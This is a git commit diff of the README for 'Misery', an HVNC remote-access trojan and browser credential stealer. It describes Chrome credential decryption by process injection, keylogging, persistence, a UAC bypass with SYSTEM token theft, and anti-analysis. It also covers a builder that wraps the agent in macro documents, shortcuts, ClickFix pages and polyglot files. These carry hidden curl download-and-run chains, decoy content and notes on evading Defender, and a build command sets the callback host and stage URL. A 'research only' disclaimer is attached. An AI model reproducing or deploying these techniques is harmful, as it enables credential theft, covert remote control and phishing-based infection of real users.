mirror of
https://git.churchofmalware.org/JYenn/Misery
synced 2026-09-22 05:27:07 +00:00
docs: demo gif, readme rewrite, loopback examples, gitignore console history
This commit is contained in:
@@ -6,7 +6,13 @@
|
||||
<em>a devoted sister of the Church of Malware</em>
|
||||
</p>
|
||||
|
||||
HVNC RAT and stealer research project, derived from Misery. For local testing and research only.
|
||||
An HVNC RAT and stealer, derived from the 2023-era Creal stealer and rebuilt for Chrome's App-Bound Encryption. Chrome 127+ moved credential decryption behind ABE, a COM service running as the browser user. The agent walks that COM object in-process via indirect syscalls, so nothing credential-shaped ever touches disk. ABE research is all [xaitax](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption). Local testing and research only.
|
||||
|
||||
## Demo
|
||||
|
||||
<p align="center">
|
||||
<img src="demo.gif" alt="Misery demo" width="100%">
|
||||
</p>
|
||||
|
||||
## Features
|
||||
|
||||
@@ -19,9 +25,25 @@ HVNC RAT and stealer research project, derived from Misery. For local testing an
|
||||
- **Payload builder** (`setup.py`): msfvenom-style config, ECDH key handling, and `-p` delivery wrappers for `docm`, `xlsm`, `lnk`, `pdf`, `html`, `clickfix_html`, `iso`, `polyglot_exe_zip`, and `polyglot_html`
|
||||
- **Keylogger and clipboard monitoring**
|
||||
- **Persistence**: HKCU Run key and WMI event subscriptions
|
||||
- **Elevation** (`elevate`): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200)
|
||||
- **Elevation** (`elevate`): silent UAC bypass to High, then SYSTEM via SeDebug token theft
|
||||
- **Anti-analysis**: user-mode environment checks, reflective injection
|
||||
|
||||
## How it works
|
||||
|
||||
- **Channel**: the console holds the private half of an ECDH P-256 keypair in `.misery_key`; the agent only ever ships the public half. Every session derives a fresh AES-256-GCM key from the handshake, so no key material repeats across bots.
|
||||
- **Stealing**: spawn a suspended Chrome or Edge, inject the payload DLL in-process, and walk the ABE COM object to decrypt the stored credentials. No disk write, and the browser never visibly opens.
|
||||
- **HVNC**: `hvnc start` runs GDI apps on a hidden desktop and streams frames to the operator view. `ghost <url>` drives a real Chromium over CDP, logged into the victim's profiles; the browser is basically them.
|
||||
- **Elevation**: relaunch as admin via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL process.
|
||||
- **Delivery**: `setup.py -p` wraps the agent into 9 file formats; only the stage URL and agent filename are injected at build time.
|
||||
|
||||
## Tested On
|
||||
|
||||
| Target | Version |
|
||||
|---|---|
|
||||
| Google Chrome | `150.0.7871.187` |
|
||||
| Microsoft Edge | `151.0.4129.59` |
|
||||
| Elevation chain | Windows 11 25H2 (build 26200) |
|
||||
|
||||
<p align="center">
|
||||
<img src="MiseryOperatorView.png" alt="Misery operator view" width="1000">
|
||||
</p>
|
||||
@@ -57,8 +79,8 @@ filetypes in `dist/` and records each one in `<out>.manifest.json` with its
|
||||
sha256 and size. `python setup.py --list-formats` prints the current list with
|
||||
dependencies.
|
||||
|
||||
- `docm` - Word macro document; `Document_Open` shells a hidden cmd/curl download-and-run. The macro comes from a Word-authored compiled base (`wrappers_bases/docm_base.docm`); only the stage URL and agent filename are injected as document variables and read at open time, because rebuild-generated macro streams open without auto-event hooks (verified live 2026-08)
|
||||
- `xlsm` - Excel macro workbook; `Workbook_Open` shells a hidden cmd/curl download-and-run. Same design: an Excel-authored compiled base (`wrappers_bases/xlsm_base.xlsm`) with the runtime values in a hidden `cfg` sheet
|
||||
- `docm` - Word macro document; `Document_Open` shells a hidden cmd/curl download-and-run from a compiled base (`wrappers_bases/docm_base.docm`)
|
||||
- `xlsm` - Excel macro workbook; `Workbook_Open` shells the same chain from a compiled base (`wrappers_bases/xlsm_base.xlsm`); runtime values live in a hidden `cfg` sheet
|
||||
- `lnk` - shortcut plus companion `.cmd`; the LNK probes Downloads/Desktop for the `.cmd`, which opens a decoy PDF then fetches and runs the agent (the chain lives in the `.cmd` because Defender's FastPath flags any LNK-launched curl download cmdline)
|
||||
- `pdf` - agent embedded as a PDF attachment, launched on open
|
||||
- `html` - OneDrive-style page; the agent hides in a zip blob behind a button click
|
||||
@@ -68,7 +90,7 @@ dependencies.
|
||||
- `polyglot_html` - runs as an exe, shows a decoy page in a browser
|
||||
|
||||
```powershell
|
||||
python setup.py -t tcp LHOST=10.0.0.5 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://10.0.0.5:8080/misery.exe
|
||||
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://127.0.0.1:8080/misery.exe
|
||||
```
|
||||
|
||||
`-p all` builds every format. The macro, lnk, clickfix, and polyglot_exe_zip
|
||||
@@ -77,15 +99,12 @@ iso, and polyglot_html carry the agent themselves. The macro files ship with
|
||||
decoy content, and the lnk/pdf formats show a decoy document, so they read as
|
||||
normal business documents instead of empty templates.
|
||||
|
||||
The docm and xlsm bases are compiled by Word/Excel themselves so the
|
||||
`Document_Open` / `Workbook_Open` hooks actually fire: pyopenvba-style
|
||||
rebuilds write source-only module streams that Office opens in a degraded
|
||||
state where the auto-events never run (reproduced and root-caused live
|
||||
2026-08). The wrapper copies the base, fills decoy content, and injects the
|
||||
per-build values (Word docvars in `word/settings.xml`, Excel cfg-sheet cells
|
||||
in `xl/sharedStrings.xml`); the pre-compiled VBA builds the download chain
|
||||
from Chr()-encoded parts plus those values at open time, so no macro stream
|
||||
is ever rewritten.
|
||||
The docm/xlsm wrappers copy the Office-compiled base (`wrappers_bases/`), fill
|
||||
decoy content, and inject per-build values — Word docvars in `word/settings.xml`,
|
||||
Excel cfg-sheet cells in `xl/sharedStrings.xml` — so the pre-compiled VBA
|
||||
assembles the download chain at open time without rewriting any macro stream.
|
||||
They're compiled by Office itself because pyopenvba-style rebuilds leave the
|
||||
auto-events unhooked (root-caused live 2026-08).
|
||||
|
||||
The lnk and polyglot_exe_zip fetch their decoy PDF from the same directory as
|
||||
`STAGE_URL`, so host the generated `<out>.cmd` and `<out>.decoy.pdf` next to
|
||||
@@ -164,6 +183,10 @@ A fresh checkout builds against `127.0.0.1:4444`. Run `setup.py` once so `.miser
|
||||
- `wrappers_bases/`: Office-authored compiled macro bases used by the docm/xlsm wrappers
|
||||
- `build/`: out-of-source build dir
|
||||
|
||||
Love all you killas. Stay sharp. ♱
|
||||
|
||||
If you save passwords in a browser, stop: use a password manager, keep work infra on dedicated logins, and disable sites saving data. Wipe cookies on exit.
|
||||
|
||||
## Licence
|
||||
|
||||
No licence granted. Research code for study only; not licensed for redistribution or commercial use.
|
||||
Reference in New Issue
Block a user